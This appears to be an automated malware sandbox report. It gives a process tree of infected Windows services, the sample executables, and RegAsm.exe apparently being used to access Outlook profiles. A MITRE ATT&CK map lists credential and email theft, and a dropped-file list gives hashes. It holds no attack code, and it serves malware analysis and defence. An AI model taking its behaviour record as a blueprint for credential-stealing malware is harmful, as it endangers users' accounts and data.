- Drops file in Program Files directory
- Drops file in Windows directory
PID:5964

\??\c:\Program Files\Common Files\Microsoft Shared\Source Engine\OSE.EXE
"c:\Program Files\Common Files\Microsoft Shared\Source Engine\OSE.EXE"
1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Program Files directory
- Drops file in Windows directory
PID:6124

C:\Windows\system32\PerceptionSimulation\PerceptionSimulationService.exe
C:\Windows\system32\PerceptionSimulation\PerceptionSimulationService.exe
1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Program Files directory
- Drops file in Windows directory
PID:3844

C:\Windows\SysWow64\perfhost.exe
C:\Windows\SysWow64\perfhost.exe
1⤵
- Executes dropped EXE
PID:3424

C:\Windows\system32\locator.exe
C:\Windows\system32\locator.exe
1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Program Files directory
- Drops file in Windows directory
PID:4588

C:\Windows\System32\SensorDataService.exe
C:\Windows\System32\SensorDataService.exe
1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Checks SCSI registry key(s)
PID:1352

C:\Windows\System32\snmptrap.exe
C:\Windows\System32\snmptrap.exe
1⤵
- Executes dropped EXE
PID:3156

C:\Windows\system32\spectrum.exe
C:\Windows\system32\spectrum.exe
1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Checks SCSI registry key(s)
PID:832

C:\Windows\System32\OpenSSH\ssh-agent.exe
C:\Windows\System32\OpenSSH\ssh-agent.exe
1⤵
- Executes dropped EXE
PID:5244

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s SharedRealitySvc
1⤵
PID:5272

C:\Windows\system32\TieringEngineService.exe
C:\Windows\system32\TieringEngineService.exe
1⤵
- Executes dropped EXE
- Checks processor information in registry
- Suspicious use of AdjustPrivilegeToken
PID:1164

C:\Windows\system32\AgentService.exe
C:\Windows\system32\AgentService.exe
1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:5416

C:\Windows\System32\vds.exe
C:\Windows\System32\vds.exe
1⤵
- Executes dropped EXE
PID:2348

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1184

C:\Windows\system32\wbengine.exe
"C:\Windows\system32\wbengine.exe"
1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:920

C:\Windows\system32\wbem\WmiApSrv.exe
C:\Windows\system32\wbem\WmiApSrv.exe
1⤵
- Executes dropped EXE
PID:3568

C:\Windows\system32\werfault.exe
werfault.exe /h /shared Global\dbbc5d2ca53e4ae48fb3419dd5b9eb1b /t 780 /p 3388
1⤵
PID:3124

C:\Windows\system32\SearchIndexer.exe
C:\Windows\system32\SearchIndexer.exe /Embedding
1⤵
- Executes dropped EXE
- Enumerates connected drives
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2116
- C:\Windows\System32\SearchProtocolHost.exe
  "C:\Windows\System32\SearchProtocolHost.exe" Global\UsGthrFltPipeMssGthrPipe1_ Global\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 "Software\Microsoft\Windows Search" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)" "C:\ProgramData\Microsoft\Search\Data\Temp\usgthrsvc" "DownLevelDaemon"
  2⤵
  - Modifies data under HKEY_USERS
  PID:2000
- C:\Windows\system32\SearchFilterHost.exe
  "C:\Windows\system32\SearchFilterHost.exe" 940 2808 2804 924 {0E5DCEC5-7795-4E38-9621-94DFD9F9A421}
  2⤵
  - Modifies data under HKEY_USERS
  PID:5604
- C:\Windows\system32\SearchFilterHost.exe
  "C:\Windows\system32\SearchFilterHost.exe" 940 2740 2724 924 {85EE815A-7738-4808-A14A-3AD87E32A3BF}
  2⤵
  - Modifies data under HKEY_USERS
  PID:3296
- C:\Windows\System32\SearchProtocolHost.exe
  "C:\Windows\System32\SearchProtocolHost.exe" Global\UsGthrFltPipeMssGthrPipe2_ Global\UsGthrCtrlFltPipeMssGthrPipe2 1 -2147483646 "Software\Microsoft\Windows Search" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)" "C:\ProgramData\Microsoft\Search\Data\Temp\usgthrsvc" "DownLevelDaemon"
  2⤵
  PID:4076
- C:\Windows\system32\SearchFilterHost.exe
  "C:\Windows\system32\SearchFilterHost.exe" 940 2740 2724 924 {85EE815A-7738-4808-A14A-3AD87E32A3BF}
  2⤵
  PID:5348
- C:\Windows\System32\SearchProtocolHost.exe
  "C:\Windows\System32\SearchProtocolHost.exe" Global\UsGthrFltPipeMssGthrPipe3_ Global\UsGthrCtrlFltPipeMssGthrPipe3 1 -2147483646 "Software\Microsoft\Windows Search" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)" "C:\ProgramData\Microsoft\Search\Data\Temp\usgthrsvc" "DownLevelDaemon"
  2⤵
  PID:3132
- C:\Windows\system32\SearchFilterHost.exe
  "C:\Windows\system32\SearchFilterHost.exe" 940 2740 2724 924 {85EE815A-7738-4808-A14A-3AD87E32A3BF}
  2⤵
  PID:6012

C:\Windows\System32\NOTEPAD.EXE
"C:\Windows\System32\NOTEPAD.EXE" C:\Users\Admin\Desktop\RevokeSend.cmd
1⤵
- Opens file in notepad (likely ransom note)
PID:1740

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:1364

C:\Windows\system32\BackgroundTransferHost.exe
"BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.13
1⤵
- Modifies registry class
PID:5348

C:\Windows\system32\control.exe
"C:\Windows\system32\control.exe" /name Microsoft.AdministrativeTools
1⤵
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
PID:5988

C:\Windows\SysWOW64\DllHost.exe
C:\Windows\SysWOW64\DllHost.exe /Processid:{06622D85-6856-4460-8DE1-A81921B41C4B}
1⤵
- System Location Discovery: System Language Discovery
PID:3812

C:\Windows\explorer.exe
C:\Windows\explorer.exe /factory,{5BD95610-9434-43C2-886C-57852CC8A120} -Embedding
1⤵
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious behavior: AddClipboardFormatListener
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:2232
- C:\Windows\system32\cmd.exe
  "C:\Windows\system32\cmd.exe"
  2⤵
  PID:4564
- C:\Windows\system32\taskmgr.exe
  "C:\Windows\system32\taskmgr.exe" /7
  2⤵
  - Checks SCSI registry key(s)
  - Modifies registry class
  - Suspicious behavior: GetForegroundWindowSpam
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  PID:6000

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
1⤵
- Drops file in Windows directory
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:3940
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x108,0x10c,0x110,0xd8,0x114,0x7ffdf300cc40,0x7ffdf300cc4c,0x7ffdf300cc58
  2⤵
  PID:4472
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1744,i,5814790935796660288,8023183576045207365,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1768 /prefetch:2
  2⤵
  PID:132
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2116,i,5814790935796660288,8023183576045207365,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2120 /prefetch:3
  2⤵
  PID:4424
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2180,i,5814790935796660288,8023183576045207365,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2192 /prefetch:8
  2⤵
  PID:484
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3056,i,5814790935796660288,8023183576045207365,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3080 /prefetch:1
  2⤵
  PID:4452
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3312,i,5814790935796660288,8023183576045207365,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3320 /prefetch:1
  2⤵
  PID:4076
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4408,i,5814790935796660288,8023183576045207365,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4404 /prefetch:1
  2⤵
  PID:5708
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4684,i,5814790935796660288,8023183576045207365,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4700 /prefetch:8
  2⤵
  PID:4548
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4772,i,5814790935796660288,8023183576045207365,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4780 /prefetch:8
  2⤵
  PID:4676
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4724,i,5814790935796660288,8023183576045207365,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4708 /prefetch:8
  2⤵
  PID:5788
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4696,i,5814790935796660288,8023183576045207365,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4812 /prefetch:8
  2⤵
  PID:5384
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4728,i,5814790935796660288,8023183576045207365,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5168 /prefetch:8
  2⤵
  PID:5812
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5156,i,5814790935796660288,8023183576045207365,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4832 /prefetch:8
  2⤵
  PID:1148
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --field-trial-handle=5176,i,5814790935796660288,8023183576045207365,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4600 /prefetch:2
  2⤵
  PID:5788
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --field-trial-handle=5024,i,5814790935796660288,8023183576045207365,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5164 /prefetch:1
  2⤵
  PID:2064
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --field-trial-handle=3816,i,5814790935796660288,8023183576045207365,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5264 /prefetch:1
  2⤵
  PID:4720
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --field-trial-handle=3216,i,5814790935796660288,8023183576045207365,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4252 /prefetch:1
  2⤵
  PID:1472
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=3368,i,5814790935796660288,8023183576045207365,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3968 /prefetch:8
  2⤵
  - NTFS ADS
  PID:396
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --no-appcompat-clear --gpu-preferences=WAAAAAAAAADoAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAACEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=4492,i,5814790935796660288,8023183576045207365,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4848 /prefetch:8
  2⤵
  PID:6008
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=3184,i,5814790935796660288,8023183576045207365,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4392 /prefetch:8
  2⤵
  - NTFS ADS
  PID:724

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
1⤵
PID:1336

C:\Program Files\7-Zip\7zG.exe
"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\" -an -ai#7zMap2684:190:7zEvent11812
1⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
PID:5524

C:\Users\Admin\Downloads\4e38df6415cd9a8857c5ff4185da103fa8585e8a589ff2286eaf7317e3d10755.exe
"C:\Users\Admin\Downloads\4e38df6415cd9a8857c5ff4185da103fa8585e8a589ff2286eaf7317e3d10755.exe"
1⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:2368

C:\Program Files\7-Zip\7zG.exe
"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\" -an -ai#7zMap26309:190:7zEvent25528
1⤵
- Executes dropped EXE
PID:4208

C:\Users\Admin\Downloads\2578fed47caff2eefa4dda53358de9e0b1fd7835edcf54e3f99dac7dae759a82.exe
"C:\Users\Admin\Downloads\2578fed47caff2eefa4dda53358de9e0b1fd7835edcf54e3f99dac7dae759a82.exe"
1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:4624
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
  2⤵
  - Accesses Microsoft Outlook profiles
  - System Location Discovery: System Language Discovery
  PID:4788

C:\Users\Admin\Downloads\2578fed47caff2eefa4dda53358de9e0b1fd7835edcf54e3f99dac7dae759a82.exe
"C:\Users\Admin\Downloads\2578fed47caff2eefa4dda53358de9e0b1fd7835edcf54e3f99dac7dae759a82.exe"
1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:3620
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
  2⤵
  - Accesses Microsoft Outlook profiles
  - System Location Discovery: System Language Discovery
  - outlook_office_path
  - outlook_win_path
  PID:4736

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Modify Registry

T1112

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Data from Local System

T1005

Email Collection

T1114

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe

Filesize
1.3MB

MD5
cac2b6c5cd96206ded0feb748d5f7f76

SHA1
e37fb90c3c9a7d0db03d44bc1210aa7e269aeb3e

SHA256
73f1ec64e3c63d62601c9260cc2a43a65cbc57859f8b53e5255f0f06c4c8b717

SHA512
d934d32e724968366265f2d3d79bd9c5da129de0f21d9b9598ed15150f4c74ec7f999b16cf53d4bd9ae09fd06889f71781981d1517e045ede66448356e0cc94f

Download Submit
C:\Program Files\7-Zip\7z.exe

Filesize
1.6MB

MD5
6c309b1141360cefd10442f1e5150c2c

SHA1
bf72e7927be9a28a108d5a2b2dc4508e6b18757f

SHA256
a94231f43348a82cb8032a1530b3ac5ef3cee2d73063305ffee95e86128ad695

SHA512
73d07f739000096f7619c6816baf7bc1e88677d9a8fe868990ad83dc5c476ac6c9580653fb48cc9bf24fc943e409f3ec9b33f282d6b537affdbafc77b55fbcd6

Download Submit
C:\Program Files\7-Zip\7zFM.exe

Filesize
1.5MB

MD5
d1d09fc0732ec7f3ffde58f3089cbd99

SHA1
e8f9ad200cb5f9c6e7fb3dcb3d1783e1c0d9138d

SHA256
a3d58cd03238b76c58bed146ecb9a5b27cd5e7b1b505de10e5f6d65f8a1c8cb7

SHA512
88629357ba4d2e635ddd3c36c5051e711e2d77ddc1b477498e5bbc2bcdc5f9d0f809aa1efdd88f042707644727669bb706cbe138bb1e3978b751b22fed6f0cc2

Download Submit
C:\Program Files\7-Zip\7zG.exe

Filesize
1.2MB

MD5
74ae0e2841331642447930778fc7e96a

SHA1
0a0721ea80fb24b385b0e1d9abe94a28f90aa5a8

SHA256
1460558e64204b6494b99d733360759aa87bd50a709bdd23748b9c5d8185082a

SHA512
747ee7a55c588243afc37046db20f7b10c84d1fa89ab4c35749037a7637de6357bf2c7e8ccd1fec14040a1ff8247e4261a18b7bebb179c6345eb07e8a2e00f9b

Download Submit
C:\Program Files\7-Zip\Uninstall.exe

Filesize
1.1MB

MD5
60449544dd77ae87179ced0e7eefee03

SHA1
58094faaa72242aecd5c8564e5fb0546def6c670

SHA256
0c8365d3ff02456d3685707fb51fdbc52500683a4104dd8d875c1f33d6bf4a23

SHA512
930e09f43b14107ecc1094083ee6d8204fd2ac20c50c026227979d938d2c88bcc1b0a44e921c6c76428c53a737050ae2758342247fb65878949bbb1660abf7f2

Download Submit
C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVShNotify.exe

Filesize
1.3MB

MD5
200a43c6cabd63bb5f6cae65682c50db

SHA1
e32f983da213c290ac8a5a05076218c1d8ee6a6c

SHA256
5fe7876a1d01a9c16351e4d64b1674d162bb001335607a2dbe0cba36d1070b3b

SHA512
3b208d5e3d05f06e37e077a930cb42d63838de92cc5fe8987085236dd045333544c7c97676fbda968fc6574433293fda3ee90f40e152e977c7713d48e3e896fa

Download Submit
C:\Program Files\Common Files\microsoft shared\ClickToRun\IntegratedOffice.exe

Filesize
4.6MB

MD5
952172b16f7a8883ec1715c960dbcea1

SHA1
de0502ea4bff96c6ea3a8e64d7adde5847cf0b7b

SHA256
680aeba475540433e2b783c40768be683948553d8327df3094fe18d87001ef5a

SHA512
53ef3397240cb2aba2255e9007ded261e399876027d46c115714fff9d6cd2d89397ec70863750e338d6ad6792f40b849fd8e1b30510db2e87d218550f6ceef7d

Download Submit
C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exe

Filesize
1.4MB

MD5
5f34a26f93bf7e5938c076e93f4437ef

SHA1
127288baa3d2e1494f12043a20d93a682f52cf99

SHA256
f83aa6025b5d8474d5c7b521df8850a3c2dff13a137b08dfaddfafc5a84e9364

SHA512
7a033fcc988176a7b4016af1e82d11443836b15323ae767efbd740d50f15a465236db6badab2393ed7cf4fb3bd9c01ff4a2cc44511d081d9cb82381ec44a9738

Download Submit
C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeC2RClient.exe

Filesize
24.0MB

MD5
ca3143a0cad6e341eccb9965ac3916cc

SHA1
00a9ab9eef08866d8eeb6b8dd3e9bd06bb645b74

SHA256
0fd4a8df9788c023c139747ac1c172854c5f779824bee315597841620fb57534

SHA512
48b5eda658a931844f9d957e3223e10c54f21d4d1a7f635a7e5a9a662850a3046607b48baaad1e70268d4805f70f2bd749fda6b3f0031b5de091b0282a6d33b3

Download Submit
C:\Program Files\Common Files\microsoft shared\ClickToRun\appvcleaner.exe

Filesize
2.7MB

MD5
21ff69d8af346ae808ca83bdcdd2161c

SHA1
a487d89b9154df9079c99359a061499af856d3a4

SHA256
66d6f94c14c2c00e2d842e158599279db36dfea6d1cb69f1544d8da993b4c9db

SHA512
5ab577037057312c77bab8382897e97fb86513a7b52aa038bc62a944cd510c70d078991e65f0cd0baa7764237fcc200f1465f4a094847c334aafb44b5f6c48bf

Download Submit
C:\Program Files\Common Files\microsoft shared\OFFICE16\LICLUA.EXE

Filesize
1.1MB

MD5
c6a0ae2c1a147fb80bd0388e7286c0fd

SHA1
24f3f75684f3b3a64b074491c2ff62ad5bff1110

SHA256
50e041dbda29c1032085aa3f0deb99c5a4a336805ba127896b3d89ddbf586fec

SHA512
acc3c9c12eaa5d7334d23c3d6e9d1998a3099e49978460cee8e890a637e610a2bc4fa101a3ef6e30dbd95bdb6afae9e8b57796f993a360a3c457d0189a0a251c

Download Submit
C:\Program Files\Common Files\microsoft shared\Source Engine\OSE.EXE

Filesize
1.3MB

MD5
c66667660226e87ba62de8c327f5c3e1

SHA1
8480e00896023036a76adbfce1a962bddd5e70ac

SHA256
db09601f5b91982bbd8bf1f34723ea23c6e3760b16e19f206fe091819d26fcfc

SHA512
2ee5e5e210eb5a1c45646a73f8a125244ae19f2f6ab73a74e1f450d70eb8a2511f48bf40a40a02acda9d3278834d55049c264a861f72e48f9a77074cbf3da853

Download Submit
C:\Program Files\Common Files\microsoft shared\VSTO\10.0\VSTOInstaller.exe

Filesize
1.2MB

MD5
d513c224dc0575c1dcb02705f37dbc44

SHA1
f2739d55b2366fef898e87ab8374682ca15fe3ad

SHA256
397c7e3a1c98d6e1438057f43cd778741a823c5184b6bf156992c55fe3090f33

SHA512
3a07ec2a8b0da1fb72b7728265f5fa9fdebc61f22519da0cda5681ddbd079088a212bbe53341f9b756db7aa1fc4bc3976832985db00be1af2a38916057c45b97

Download Submit
C:\Program Files\Google\Chrome\Application\123.0.6312.123\Installer\chrmstp.exe

Filesize
4.6MB

MD5
6fde33fabfb6a5bbf1615857291f836f

SHA1
ac2a7d6f899ce0322c40adb9cc623b8c8b6f4af0

SHA256
0543d2ce702a87edc8aa5886c7ed5cfe5fad9317388d98733e7d2bf27614c4b6

SHA512
f35ae69838fff8ad0bc971abee44692724288d54c29a53a0d023c90c0c8a24224549439e34ae30871f637371ca81d08107156ee99875ed52653b72f2cdecfda9

Download Submit
C:\Program Files\Google\Chrome\Application\123.0.6312.123\Installer\setup.exe

Filesize
4.6MB

MD5
3cd630eb7af971b6488f63703499a96e

SHA1
1bddfd47ed07858fee911b6204f00507647709b3

SHA256
d148fee94ef181bd3a174e447f10393f754731f6710166122d09098bdf6627ac

SHA512
5ac0538485ef6948a013bf52f141c96b02dc9f13b709dc6d6e17912b65cfdd69ff80044862f0bb515a6b44cc4ea35a5279b0ba14ef343a627c17f9a30120e9f0

Download Submit
C:\Program Files\Google\Chrome\Application\123.0.6312.123\chrome_pwa_launcher.exe

Filesize
1.9MB

MD5
2cda2857a25d606f08c274bbfcab2585

SHA1
e84f2d94b36f6796ee5838300ba95c044db5a666

SHA256
72f599f68f1a9f38eb5734d33f61d4f4c29f98ac4e3ed691f35e2fb33feb7bdb

SHA512
baf2784146e8fc4552cb29ab85a7722abe87ed8dd9afdc6735b5ab41c0dc809e809c4569d35d478cd43a6e91c79bc1fab5df77b5d1fda5b4ef5b8f53868b2f4a

Download Submit
C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe

Filesize
2.1MB

MD5
bc8951e1b0f23b29eab0a72f77b3a21a

SHA1
1935e229b2f3bbd631c0083eee4725372068128f

SHA256
11d8d058809b8550abb8c00022b11d05821c428b18adfe18f987ff2b372a80ec

SHA512
01549a6e60cfdbcb708bea547d1d07cc614f6c5507609bfbe83ecc5f50f609b40b9a186299cdc3654dc27d519a8b552bd0824799b30b58e532aa4b286b4e686d

Download Submit
C:\Program Files\Windows Media Player\wmpnetwk.exe

Filesize
1.5MB

MD5
25737c3617fd8459749c53551e3c570f

SHA1
0192c1d3b78b1a8cd4e118b7eda3decc6ffc7536

SHA256
8f9cf1124820dbe3a5c459a4271f355db70dec0c9a307cdeef6dc39e593ba059

SHA512
45ccb820ec0d9d62d34a894a8d538c954eee71e2cd599d5db8065f017b62862b06bd03cee83cca443739fc3579e8dc54d750ca198e6645f65bdd7c4b5b6f1077

Download Submit
C:\Program Files\dotnet\dotnet.exe

Filesize
1.2MB

MD5
8a2fccaba97e2cf87659be515c1f3279

SHA1
fcea8a66541c82c238b7849b0f1309d348aeba8b

SHA256
f2e3e5fa620afbfc2ce138325e1a2d83380ee991ba60489bea5e52b2b9325fb4

SHA512
f41f279dde9fcdaea2c528d198e61bbd0bcf62b52e97bc6d9798e0759261b15ca33cd7f48eaa845af2a38eecc9495b0e0f404dd36989ab9b61a1c992495256fb

Download Submit
C:\Users\Admin\AppData\Local\D3DSCache\cb00da9ba77862e\F4EB2D6C-ED2B-4BDD-AD9D-F913287E6768.idx

Filesize
64KB

MD5
b5ad5caaaee00cb8cf445427975ae66c

SHA1
dcde6527290a326e048f9c3a85280d3fa71e1e22

SHA256
b6409b9d55ce242ff022f7a2d86ae8eff873daabf3a0506031712b8baa6197b8

SHA512
92f7fbbcbbea769b1af6dd7e75577be3eb8bb4a4a6f8a9288d6da4014e1ea309ee649a7b089be09ba27866e175ab6f6a912413256d7e13eaf60f6f30e492ce7f

Download Submit
C:\Users\Admin\AppData\Local\D3DSCache\cb00da9ba77862e\F4EB2D6C-ED2B-4BDD-AD9D-F913287E6768.lock

Filesize
4B

MD5
f49655f856acb8884cc0ace29216f511

SHA1
cb0f1f87ec0455ec349aaa950c600475ac7b7b6b

SHA256
7852fce59c67ddf1d6b8b997eaa1adfac004a9f3a91c37295de9223674011fba

SHA512
